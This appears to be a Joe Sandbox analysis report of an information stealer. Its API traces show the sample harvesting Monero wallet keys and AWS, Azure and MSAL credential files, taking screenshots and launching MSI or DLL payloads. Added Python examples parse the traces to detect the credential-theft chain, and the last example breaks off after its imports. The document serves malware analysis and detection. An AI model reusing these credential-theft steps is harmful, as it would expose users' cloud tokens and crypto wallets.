                                 • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                • String ID: "$"$------$------$------
                                • API String ID: 874700897-2180234286
                                • Opcode ID: b282de162cfa55a79ad3ebdba361919ece4e7c2baa2ffdca3b6cd300a580c86a
                                • Instruction ID: a4d4bc963304515209db162b52e437e91f41d067f9903f06284b2b8861a3d894
                                • Opcode Fuzzy Hash: b282de162cfa55a79ad3ebdba361919ece4e7c2baa2ffdca3b6cd300a580c86a
                                • Instruction Fuzzy Hash: 6D121F71920128AADB15EBA4DC95FEEB378FF14700F4081AAB50663191EF742B4ACF75
                                APIs
                                  • Part of subcall function 00DDA740: lstrcpy.KERNEL32(00DE0E17,00000000), ref: 00DDA788
                                  • Part of subcall function 00DDA9B0: lstrlen.KERNEL32(?,01629208,?,\Monero\wallet.keys,00DE0E17), ref: 00DDA9C5
                                  • Part of subcall function 00DDA9B0: lstrcpy.KERNEL32(00000000), ref: 00DDAA04
                                  • Part of subcall function 00DDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DDAA12
                                  • Part of subcall function 00DDA8A0: lstrcpy.KERNEL32(?,00DE0E17), ref: 00DDA905
                                  • Part of subcall function 00DD8B60: GetSystemTime.KERNEL32(00DE0E1A,0162A7E0,00DE05AE,?,?,00DC13F9,?,0000001A,00DE0E1A,00000000,?,01629208,?,\Monero\wallet.keys,00DE0E17), ref: 00DD8B86
                                  • Part of subcall function 00DDA920: lstrcpy.KERNEL32(00000000,?), ref: 00DDA972
                                  • Part of subcall function 00DDA920: lstrcat.KERNEL32(00000000), ref: 00DDA982
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00DCCF83
                                • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00DCD0C7
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00DCD0CE
                                • lstrcat.KERNEL32(?,00000000), ref: 00DCD208
                                • lstrcat.KERNEL32(?,00DE1478), ref: 00DCD217
                                • lstrcat.KERNEL32(?,00000000), ref: 00DCD22A
                                • lstrcat.KERNEL32(?,00DE147C), ref: 00DCD239
                                • lstrcat.KERNEL32(?,00000000), ref: 00DCD24C
                                • lstrcat.KERNEL32(?,00DE1480), ref: 00DCD25B
                                • lstrcat.KERNEL32(?,00000000), ref: 00DCD26E
                                • lstrcat.KERNEL32(?,00DE1484), ref: 00DCD27D
                                • lstrcat.KERNEL32(?,00000000), ref: 00DCD290
                                • lstrcat.KERNEL32(?,00DE1488), ref: 00DCD29F
                                • lstrcat.KERNEL32(?,00000000), ref: 00DCD2B2
                                • lstrcat.KERNEL32(?,00DE148C), ref: 00DCD2C1
                                • lstrcat.KERNEL32(?,00000000), ref: 00DCD2D4
                                • lstrcat.KERNEL32(?,00DE1490), ref: 00DCD2E3
                                  • Part of subcall function 00DDA820: lstrlen.KERNEL32(00DC4F05,?,?,00DC4F05,00DE0DDE), ref: 00DDA82B
                                  • Part of subcall function 00DDA820: lstrcpy.KERNEL32(00DE0DDE,00000000), ref: 00DDA885
                                • lstrlen.KERNEL32(?), ref: 00DCD32A
                                • lstrlen.KERNEL32(?), ref: 00DCD339
                                  • Part of subcall function 00DDAA70: StrCmpCA.SHLWAPI(01628FB8,00DCA7A7,?,00DCA7A7,01628FB8), ref: 00DDAA8F
                                • DeleteFileA.KERNEL32(00000000), ref: 00DCD3B4
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                 • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                • String ID:
                                • API String ID: 1956182324-0
                                • Opcode ID: eef63c011a3dd9a5d010b80769714932e7dddfa45ea347cfeffa4e64008abcd2
                                • Instruction ID: 0768954521771b1396e7a8a8318e18f9b2bd229d4d15748a63648bac61a2fcb8
                                • Opcode Fuzzy Hash: eef63c011a3dd9a5d010b80769714932e7dddfa45ea347cfeffa4e64008abcd2
                                • Instruction Fuzzy Hash: 45E16E71910219ABCB15FBA4DD96EEE7338FF14300F10815AF507A3291DE39AA09DB72
                                APIs
                                  • Part of subcall function 00DDA740: lstrcpy.KERNEL32(00DE0E17,00000000), ref: 00DDA788
                                  • Part of subcall function 00DDA920: lstrcpy.KERNEL32(00000000,?), ref: 00DDA972
                                  • Part of subcall function 00DDA920: lstrcat.KERNEL32(00000000), ref: 00DDA982
                                  • Part of subcall function 00DDA8A0: lstrcpy.KERNEL32(?,00DE0E17), ref: 00DDA905
                                  • Part of subcall function 00DDA9B0: lstrlen.KERNEL32(?,01629208,?,\Monero\wallet.keys,00DE0E17), ref: 00DDA9C5
                                  • Part of subcall function 00DDA9B0: lstrcpy.KERNEL32(00000000), ref: 00DDAA04
                                  • Part of subcall function 00DDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DDAA12
                                • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0162D488,00000000,?,00DE144C,00000000,?,?), ref: 00DCCA6C
                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00DCCA89
                                • GetFileSize.KERNEL32(00000000,00000000), ref: 00DCCA95
                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00DCCAA8
                                • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00DCCAD9
                                • StrStrA.SHLWAPI(?,0162D428,00DE0B52), ref: 00DCCAF7
                                • StrStrA.SHLWAPI(00000000,0162D458), ref: 00DCCB1E
                                • StrStrA.SHLWAPI(?,0162DA00,00000000,?,00DE1458,00000000,?,00000000,00000000,?,016290E8,00000000,?,00DE1454,00000000,?), ref: 00DCCCA2
                                • StrStrA.SHLWAPI(00000000,0162DA60), ref: 00DCCCB9
                                  • Part of subcall function 00DCC820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00DCC871
                                  • Part of subcall function 00DCC820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00DCC87C
                                • StrStrA.SHLWAPI(?,0162DA60,00000000,?,00DE145C,00000000,?,00000000,01629058), ref: 00DCCD5A
                                • StrStrA.SHLWAPI(00000000,016291A8), ref: 00DCCD71
                                  • Part of subcall function 00DCC820: lstrcat.KERNEL32(?,00DE0B46), ref: 00DCC943
                                  • Part of subcall function 00DCC820: lstrcat.KERNEL32(?,00DE0B47), ref: 00DCC957
                                  • Part of subcall function 00DCC820: lstrcat.KERNEL32(?,00DE0B4E), ref: 00DCC978
                                • lstrlen.KERNEL32(00000000), ref: 00DCCE44
                                • CloseHandle.KERNEL32(00000000), ref: 00DCCE9C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                 • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                • String ID:
                                • API String ID: 3744635739-3916222277
                                • Opcode ID: 2f8c3cf8a5659fd59c5d1e36a067220c247b59ec2cc48142667446d0aa5b9f9b
                                • Instruction ID: d6eacb15c411033c0da7f2a43432d79e4cc27f0d455dd4d7000ffcfad1e7a241
                                • Opcode Fuzzy Hash: 2f8c3cf8a5659fd59c5d1e36a067220c247b59ec2cc48142667446d0aa5b9f9b
                                • Instruction Fuzzy Hash: FCE13C71910158ABDB15EBA8DC92FEEB778EF14300F40815AF506A3291EF346A4ACF75
                                APIs
                                  • Part of subcall function 00DDA740: lstrcpy.KERNEL32(00DE0E17,00000000), ref: 00DDA788
                                • RegOpenKeyExA.ADVAPI32(00000000,0162B048,00000000,00020019,00000000,00DE05B6), ref: 00DD83A4
                                • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00DD8426
                                • wsprintfA.USER32 ref: 00DD8459
                                • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00DD847B
                                • RegCloseKey.ADVAPI32(00000000), ref: 00DD848C
                                • RegCloseKey.ADVAPI32(00000000), ref: 00DD8499
                                  • Part of subcall function 00DDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00DDA7E6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                 • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseOpenlstrcpy$Enumwsprintf
                                • String ID: - $%s\%s$?
                                • API String ID: 3246050789-3278919252
                                • Opcode ID: 187943b1652f99ac8d2d521ce5f466605674e08be1342ea45413c888272029a8
                                • Instruction ID: 180bd8deb7bf137fc04db5c1520b38072abc76b67a4177bbbea59b9dece65d6d
                                • Opcode Fuzzy Hash: 187943b1652f99ac8d2d521ce5f466605674e08be1342ea45413c888272029a8
                                • Instruction Fuzzy Hash: 78810D71910218ABDB25DB54CC95FEA77B8FF08700F00C29AE549A6240DF75AB85DFB4
                                APIs
                                  • Part of subcall function 00DD8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00DD8E0B
                                • lstrcat.KERNEL32(?,00000000), ref: 00DD4DB0
                                • lstrcat.KERNEL32(?,\.azure\), ref: 00DD4DCD
                                  • Part of subcall function 00DD4910: wsprintfA.USER32 ref: 00DD492C
                                  • Part of subcall function 00DD4910: FindFirstFileA.KERNEL32(?,?), ref: 00DD4943
                                • lstrcat.KERNEL32(?,00000000), ref: 00DD4E3C
                                • lstrcat.KERNEL32(?,\.aws\), ref: 00DD4E59
                                  • Part of subcall function 00DD4910: StrCmpCA.SHLWAPI(?,00DE0FDC), ref: 00DD4971
                                  • Part of subcall function 00DD4910: StrCmpCA.SHLWAPI(?,00DE0FE0), ref: 00DD4987
                                  • Part of subcall function 00DD4910: FindNextFileA.KERNEL32(000000FF,?), ref: 00DD4B7D
                                  • Part of subcall function 00DD4910: FindClose.KERNEL32(000000FF), ref: 00DD4B92
                                • lstrcat.KERNEL32(?,00000000), ref: 00DD4EC8
                                • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00DD4EE5
                                  • Part of subcall function 00DD4910: wsprintfA.USER32 ref: 00DD49B0
                                  • Part of subcall function 00DD4910: StrCmpCA.SHLWAPI(?,00DE08D2), ref: 00DD49C5
                                  • Part of subcall function 00DD4910: wsprintfA.USER32 ref: 00DD49E2
                                  • Part of subcall function 00DD4910: PathMatchSpecA.SHLWAPI(?,?), ref: 00DD4A1E
                                  • Part of subcall function 00DD4910: lstrcat.KERNEL32(?,0162E9B8), ref: 00DD4A4A
                                  • Part of subcall function 00DD4910: lstrcat.KERNEL32(?,00DE0FF8), ref: 00DD4A5C
                                  • Part of subcall function 00DD4910: lstrcat.KERNEL32(?,?), ref: 00DD4A70
                                  • Part of subcall function 00DD4910: lstrcat.KERNEL32(?,00DE0FFC), ref: 00DD4A82
                                  • Part of subcall function 00DD4910: lstrcat.KERNEL32(?,?), ref: 00DD4A96
                                  • Part of subcall function 00DD4910: CopyFileA.KERNEL32(?,?,00000001), ref: 00DD4AAC
                                  • Part of subcall function 00DD4910: DeleteFileA.KERNEL32(?), ref: 00DD4B31
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                 • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                • API String ID: 949356159-974132213
                                • Opcode ID: 110194572d335d5e2c2bec7378f4421b56730070b27e5f2468e804525c7638fe
                                • Instruction ID: 989e47edabc6193aaaba996472d071f345b66da5c6c4ba04ced7affed4a467a0
                                • Opcode Fuzzy Hash: 110194572d335d5e2c2bec7378f4421b56730070b27e5f2468e804525c7638fe
                                • Instruction Fuzzy Hash: C441A3B9A503186BDB60F760EC47FED3338AB24700F404454B585661C2EEB59BCD8BB2
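Worked example (added here; it is not Joe Sandbox output and not code from the sample): a small parser for the `APIs` trace lines above, plus a check for the pattern this function shows, a user folder resolved with SHGetFolderPathA, the fragments `\.azure\`, `\.aws\` and `\.IdentityService\` appended to it, then FindFirstFileA, PathMatchSpecA, CopyFileA and DeleteFileA in the enumeration helper at 00DD4910. The line regex is fitted to the lines on this page, the CSIDL names and the meaning attached to each directory are the editor's assumptions, and the negative-case trace is constructed.

```python
"""Parse Joe Sandbox 'APIs' trace lines and flag the credential-directory
harvesting pattern (folder lookup, path build, enumerate, copy, delete).

Added example; not Joe Sandbox or sample code. The CSIDL table and the
credential-directory table are the editor's assumptions."""
import re
from dataclasses import dataclass
from typing import Optional

# Shape of one trace line, e.g.
#   • Part of subcall function 00DD4910: lstrcat.KERNEL32(?,\.aws\), ref: 00DD4E59
#   • wsprintfA.USER32 ref: 00DD8459          (no argument list)
_LINE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# CSIDL values commonly passed to SHGetFolderPathA; 0x1C is the one in the listing.
CSIDL_NAMES = {0x05: "CSIDL_PERSONAL", 0x1A: "CSIDL_APPDATA",
               0x1C: "CSIDL_LOCAL_APPDATA", 0x28: "CSIDL_PROFILE"}

# Path fragments the function concatenates, mapped to what normally lives there (assumption).
CREDENTIAL_DIRS = {
    "\\.aws\\": "AWS CLI credentials/config",
    "\\.azure\\": "Azure CLI token cache",
    "\\.IdentityService\\": "MSAL token cache (msal.cache)",
}

@dataclass
class ApiCall:
    api: str
    module: str
    args: list[str]
    ref: int                    # call-site address
    subcall_of: Optional[int]   # callee address when the line is "Part of subcall function"

@dataclass
class Finding:
    base_folder: str            # decoded CSIDL the path is built from
    targets: list[str]          # credential directories appended to it
    file_ops: list[str]         # enumeration/copy/delete APIs seen, in order
    staged_then_deleted: bool   # copy followed by delete: files staged, then cleaned up

def parse_trace(text: str) -> list[ApiCall]:
    calls = []
    for line in text.splitlines():
        m = _LINE.match(line)
        if not m:
            continue                      # headers such as "APIs" or "Strings"
        args = m["args"].split(",") if m["args"] else []
        sub = int(m["sub"], 16) if m["sub"] else None
        calls.append(ApiCall(m["api"], m["mod"], args, int(m["ref"], 16), sub))
    return calls

def find_credential_harvest(calls: list[ApiCall]) -> Optional[Finding]:
    base, targets, ops = None, [], []
    for c in calls:
        if c.api == "SHGetFolderPathA" and len(c.args) > 1 and c.args[1] != "?":
            csidl = int(c.args[1], 16)
            base = CSIDL_NAMES.get(csidl, f"CSIDL_0x{csidl:02X}")
        elif c.api == "lstrcat":
            targets += [a for a in c.args if a in CREDENTIAL_DIRS and a not in targets]
        elif c.api in ("FindFirstFileA", "FindNextFileA", "PathMatchSpecA",
                       "CopyFileA", "DeleteFileA") and c.api not in ops:
            ops.append(c.api)
    # Require the full chain: folder resolved, credential dir appended, enumerated, copied.
    if base and targets and "FindFirstFileA" in ops and "CopyFileA" in ops:
        copied = ops.index("CopyFileA")
        deleted = "DeleteFileA" in ops and ops.index("DeleteFileA") > copied
        return Finding(base, targets, ops, deleted)
    return None

# Sample input: trace lines of the function above, copied from the listing.
SAMPLE_TRACE = r"""
• Part of subcall function 00DD8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00DD8E0B
• lstrcat.KERNEL32(?,00000000), ref: 00DD4DB0
• lstrcat.KERNEL32(?,\.azure\), ref: 00DD4DCD
• Part of subcall function 00DD4910: wsprintfA.USER32 ref: 00DD492C
• Part of subcall function 00DD4910: FindFirstFileA.KERNEL32(?,?), ref: 00DD4943
• lstrcat.KERNEL32(?,\.aws\), ref: 00DD4E59
• lstrcat.KERNEL32(?,\.IdentityService\), ref: 00DD4EE5
• Part of subcall function 00DD4910: PathMatchSpecA.SHLWAPI(?,?), ref: 00DD4A1E
• Part of subcall function 00DD4910: CopyFileA.KERNEL32(?,?,00000001), ref: 00DD4AAC
• Part of subcall function 00DD4910: DeleteFileA.KERNEL32(?), ref: 00DD4B31
"""

# Constructed negative case: same folder lookup and enumeration, no credential directory.
BENIGN_TRACE = r"""
• SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 00401000
• lstrcat.KERNEL32(?,\Pictures\), ref: 00401020
• FindFirstFileA.KERNEL32(?,?), ref: 00401040
• CopyFileA.KERNEL32(?,?,00000001), ref: 00401060
"""

if __name__ == "__main__":
    print(find_credential_harvest(parse_trace(SAMPLE_TRACE)))
    print(find_credential_harvest(parse_trace(BENIGN_TRACE)))
```

The check deliberately keys on the whole chain rather than on the directory names alone: a backup tool also concatenates `\.aws\` and copies files, but it does not resolve the folder through a stealer helper and then delete the copies. The argument-list split is a plain comma split, which is enough for these traces but would mis-parse an argument that itself contains a comma.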
                                APIs
                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00DD906C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                 • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateGlobalStream
                                • String ID: image/jpeg
                                • API String ID: 2244384528-3785015651
                                • Opcode ID: 65ffd1319605bf6dd9b50b356ec403b47b9072fe305fa86d29f0a0cb7ab66492
                                • Instruction ID: c35ec97e1e5ab29d648389d40acf7fab5466aa5fc612d084f7d1bccda2df4223
                                • Opcode Fuzzy Hash: 65ffd1319605bf6dd9b50b356ec403b47b9072fe305fa86d29f0a0cb7ab66492
                                • Instruction Fuzzy Hash: C471DC75A10208EBDB14EBE4D899FEEB7B8FB48700F108518F556A7284DB79E905CB70
                                APIs
                                  • Part of subcall function 00DDA740: lstrcpy.KERNEL32(00DE0E17,00000000), ref: 00DDA788
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00DD31C5
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00DD335D
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00DD34EA
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                 • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExecuteShell$lstrcpy
                                • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                • API String ID: 2507796910-3625054190
                                • Opcode ID: 462853a28e1fc02675dd01236d7ba6c684c79e71b4ff0f79c8a768291a0b880f
                                • Instruction ID: 71f57b9d42355c32aa3f4bcedf2e1da6f609e0f7190ce703a556e3dc1c1daa69
                                • Opcode Fuzzy Hash: 462853a28e1fc02675dd01236d7ba6c684c79e71b4ff0f79c8a768291a0b880f
                                • Instruction Fuzzy Hash: 21122F718001189ADB15FBA4DC92FEEB738EF14300F50816AF50666291EF746B4ADFB6
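Worked example (added here; it is not Joe Sandbox output and not code from the sample): the strings in the block above combine into two launcher shapes, `msiexec.exe /i "<file>" /passive` for an `.msi` payload and `rundll32.exe` for a `.dll`, each started through ShellExecuteEx. The block rebuilds those command lines by payload extension and applies a triage rule to process command lines. The rundll32 argument form, the user-writable-path heuristic and all sample command lines are the editor's assumptions; parent/child process relationships are not part of this listing.

```python
"""Rebuild the launcher command lines implied by the ShellExecuteEx block's
strings and check process command lines against that shape.

Added example; not Joe Sandbox or sample code. The rundll32 argument form,
the user-writable-path heuristic and the sample command lines are assumptions."""
import re
from dataclasses import dataclass
from typing import Optional

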